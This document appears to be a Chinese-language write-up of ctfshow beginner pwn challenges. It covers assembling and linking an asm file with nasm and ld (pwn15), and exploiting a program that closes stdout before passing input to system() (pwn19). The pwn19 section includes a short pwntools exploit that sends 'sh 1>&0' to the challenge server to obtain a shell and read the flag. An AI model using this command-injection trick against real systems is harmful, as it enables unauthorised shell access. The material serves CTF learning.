ctfshow-pwn入门笔记
pwn15
该题目是很简单,总结一些需要的知识点:
- 使用
as
手动编译asm
文件 - 使用
ld
手动链接可执行文件
文件下载后是一个名为flag.asm
的文件
首先使用nasm
命令编译为flag.o
文件
nasm -f elf32 flag.asm -o flag.o
-f
: 指定编译文件类型-o
: 指定编译后导出的文件名
编译后会生成一个flag.o文件,接着使用ld
命令链接
ld -m elf_i386 -s flag.o -o flag
-m
: 指定连接文件类型-s
: 最小输出-o
: 指定链接后输入的文件名
最后得到可执行文件运行得到flag
pwn19
改题目的表述为关闭了输出流,一定是最安全的吗?
使用ida分析
该程序我们输入一次值,然后就会在三秒后关闭
使用fclose()
关闭了输出流,但是我们可以将输入的命令重定向到标准输入,例如1>&0
,后面会通过read()
读取我们输入的内容保存到buf
变量,使用system
执行命令,
在本地执行命令测试
接着exp如下
from pwn import *
io = remote("pwn.challenge.ctf.show",28219)
io.recv()
io.sendline("sh 1>&0")
io.interactive()
运行得到shell,cat /ctfshow_flag
的到flag